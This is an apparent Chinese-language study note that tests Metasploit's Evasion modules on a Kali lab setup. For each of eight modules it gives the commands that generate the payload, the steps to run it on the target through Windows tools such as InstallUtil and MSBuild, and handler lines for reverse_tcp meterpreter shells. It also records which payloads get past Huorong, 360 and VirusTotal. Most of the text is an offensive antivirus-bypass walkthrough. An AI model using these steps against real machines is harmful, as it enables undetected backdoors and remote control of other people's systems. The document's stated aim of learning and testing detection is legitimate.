kali升级到5.0之后,有了一个新的模块Evasion,这个文章我就去测试一下Evasion生成的木马的实际免杀效果。
360版本:13.0.0.2002 备用木马库:2021-10-05
360杀毒:5.0.0.8140
火绒版本:5.0.63.2 病毒库:2021-09-29
Evasion使用
msfconsole进入msf
show evasion 查看Evasion所提供的模块
一、evasion/windows/windows_defender_exe模块
命令:use evasion/windows/windows_defender_exe 进入模块,设置对应的选项生成payload
这里filename是生成的payload文件名,可以自己设置,我使用的是默认的。
exploit 生成payload
使用命令:handler -H 192.168.64.133 -P 7890 -p windows/meterpreter/reverse_tcp 快速监听端口
使用命令:jobs 查看监听
测试
关闭杀软的情况下可正常上线。
开启火绒被杀
开启360,未报毒,可连接 但是用360杀毒扫描还是可以扫描出来
virustotal报毒40/68
二、evasion/windows/windows_defender_js_hta
使用命令:use evasion/windows/windows_defender_js_hta进入模块,设置对应选项,生成payload。
使用命令:handler -H 192.168.64.133 -P 7891 -p windows/x64/meterpreter/reverse_tcp 监听7891端口
测试
不开启杀软可正常上线
开启火绒被杀
开启360 未报毒(这里可能是虚拟机的原因,应该是会报蠕虫的),但是会被拦截,无法连接
VirusTotal报毒28/59
三、evasion/windows/applocker_evasion_install_util
使用命令:use evasion/windows/applocker_evasion_install_util进入模块,设置对应选项,生成payload。
这里要注意,根据提示 evasion/windows/applocker_evasion_install_util模块生成的txt要用csc.exe编译,然后使用InstallUtil.exe去运行 。
我们将这install_util.txt复制到靶机中,使用csc.exe编译
注意:要以管理员身份去编译和运行。
这里不能直接运行install_util.exe,运行没有任何作用。要用InstallUtil.exe 去运行
测试
开启火绒,会报毒
360报毒
VirusTotal报毒29/68
四、 evasion/windows/applocker_evasion_msbuild
使用命令:use evasion/windows/applocker_evasion_msbuild 进入模块,设置对应选项,生成payload。
按照提示,将msbuild.txt复制到靶机,使用MUBuild.exe运行
测试
关闭杀软,可正常上线
开启火绒,显示被杀,但是kali中可正常上线
开启360,bypass
VirusTotal报毒16/57
五、evasion/windows/applocker_evasion_presentationhost
使用命令:use evasion/windows/applocker_evasion_presentationhost 进入模块,设置对应选项,生成payload。
使用命令:handler -H 192.168.37.128 -P 7895 -p windows/meterpreter/reverse_tcp 监听7895端口
按照提示将三个文件复制到靶机,并编译运行
不过我的环境中好像无法下载,大家可以自己试试
六、 evasion/windows/applocker_evasion_regasm_regsvcs
使用命令:use evasion/windows/applocker_evasion_regasm_regsvcs 进入模块,设置对应选项,生成payload。
使用命令:handler -H 192.168.37.128 -P 7896 -p windows/meterpreter/reverse_tcp 监听7896端口
按照提示将生成的文件复制到靶机,编译运行
测试
关闭杀毒软件,可正常上线
开启火绒,火绒不报毒,正常上线,但是手动查杀可以查到
开启360,报毒
七、evasion/windows/applocker_evasion_workflow_compiler
使用命令:use evasion/windows/applocker_evasion_workflow_compiler 进入模块,设置对应选项,生成payload。
使用命令:handler -H 192.168.37.128 -P 7897 -p windows/meterpreter/reverse_tcp 监听7897端口
按照提示将文件复制到靶机,编译运行
测试
开启火绒,被杀
开启360,被杀
八、evasion/windows/process_herpaderping
使用命令:use evasion/windows/process_herpaderping 进入模块,设置对应选项,生成payload。
使用命令:handler -H 192.168.37.128 -P 7898 -p windows/x64/meterpreter/reverse_tcp 监听7898端口
将exe文件复制到靶机执行
测试
开启火绒,bypass
开启360,bypass
VirusTotal报毒35/67
免杀专题里的文章都是学习重剑无锋免杀文档的学习笔记,若有其他出处会另行标注,只用于技术交流,不可用于营利或违法活动,如果有什么错误请大家指出。